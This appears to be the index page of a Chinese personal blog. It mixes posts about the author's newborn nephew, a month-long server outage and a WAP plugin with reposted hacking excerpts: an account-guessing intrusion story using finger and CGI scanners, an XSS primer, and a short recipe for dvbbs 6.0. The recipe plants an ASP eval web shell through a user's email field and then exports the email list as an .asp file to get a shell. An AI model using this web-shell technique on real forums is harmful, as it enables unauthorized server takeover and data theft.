鬼仔's Blog

:lol: 今天终于见到我的小外甥了，哈哈。。
长的很可爱 :grin: :grin: ，而且我跟姐姐一致认为他长的像我们家的人，白白胖胖的，不像我姐夫家的人。
反正就是很高兴了，语言表达能力差。。
不过明天我就要回学校了，下次再见到他就是下星期六了！ :wink:

首先要说的就是服务器今天恢复了，不然也不会有这篇日志。
我记得是10月23日下午，服务器出了问题，然后返修，一直到今天，终于好了，也就是将近一个月的时间。
大家可以看到10月下旬和直到昨天都是一篇日志都没有。
这段时间一直打不开blog，心里有种失落感，现在服务器恢复了，挺高兴的。

然后就是我前几篇日志也写过的，现在我上学来了，多多少少的有些失望，不过既来之则安之，做好自己该做的，把自己喜欢的东西学好。
现在电脑也搬到学校来了，平时的大部分都是在宿舍上网，学点自己喜欢的东西。 阅读全文 »

:lol: 此日志专门为我的小外甥而开。
前两天妈妈打电话给我，说我小外甥出生了，哈哈，我也是舅舅了！
然后姐姐也发短信告诉了我这个消息，嘿嘿~~~
因为前两天服务器还没好，所以没发，今天在这记着我外甥的生日:

不过到现在为止我还没有见过他，我在学校，妈妈不让我请假回去，只有等下次放假的时候来了！

操作方法：在窗口里点一下鼠标左键，然后按PageDown键，就会看到文字组成的动画

需手工操作的动画：
观看地址

来自：华夏Blog

Once upon a time，我发现了一个网站，于是常规入侵。很好，它的FINGER开着，于是我编了一个SHELL，从aaa帐号试到zzz（bye the way，这是我发现的一个网上规律，那就是帐号的长度与口令的强度成正比，如果一个帐号只有两三位长，那它的口令一般也很简单，反之亦然，故且称之为若氏定理吧），结果一个帐号也不存在，我没有再试它的帐号。因为我被它开的端口吸引住了，它开着WWW，我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在，我KAO，I服了YOU！也有几个错误，我不知道如何利用，算了。又绕着主机转了几圈，象狐狸遇见刺猬，无从下嘴。

还是看看root的信息吧：finger [email protected]
Login name: root In real life: system PRIVILEGED account
阅读全文 »

文章作者：HaK_BaN[BCT]（www.cnbct.org）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

备注：本文已经刊登在9月《黑客手册》中，转载时请标明出处以及文章完整性，本文首发漏洞中心小组，后作者友情提交到邪恶八进制。

在开始读该篇文章的时候,请大家首先了解一下关于本文所提及到相关知识以及原理.
(跨站脚本攻击的详细解释)
跨站脚本攻击又名CSS/XSS,就是利用ASP等等的文件设置和编写时的错误或者疏忽不当，攻击者就可以利用这些来达到自己攻击目的，如果一个服务器存在这些漏洞，那么它的沦陷也是时间的问题！
这些文本文件一般都是要结合数据库来使用的，这些数据库有ACCESS、MSSQL、MYSQL、Oracle等！脚本攻击就是针对这些数据库来配合脚本对一些变量的过滤不严的问题来达到得到用户密码等敏感信息，修改数据库等目的！
在现在的形式来说,CS 阅读全文 »

这几天一直没怎么上网，除了些东西我都不知道，今天看到了大家都在把自己的blog改成支持wap浏览的，我就也改了改。
用的也是 Felix 做的 WAP插件V2.0最新版(Only 4 LBS) ，感谢一下先。

大家用手机访问 http://www.huaidan.org/blog/wap.asp 就可以看了。

如果只是想看看效果，可以用 Opera 或者 WinWap 来访问上面的地址，就可以看到效果。因为 Opera 和 WinWap 都具有 Wap浏览功能（推荐 Opera ）。
暂时用这个地址来访问，有空再修改一下，实现“手机用户和ＩＥ用户都可以输入同一个网址来访问我的网站”。

有手机的朋友，支持Wap的帮我测试下，谢咯！

来自：Bluelight的小窝

for dvbbs 6.0
进入后台后 ,先到用户管理 ,随便改个人的邮件地址为,<%eval request(chr(35))%>@163.com
保存后,找到邮件列表导出,然后导出邮件列表到文本 把文件名的名字改为.asp,点导出，就得到了一个shell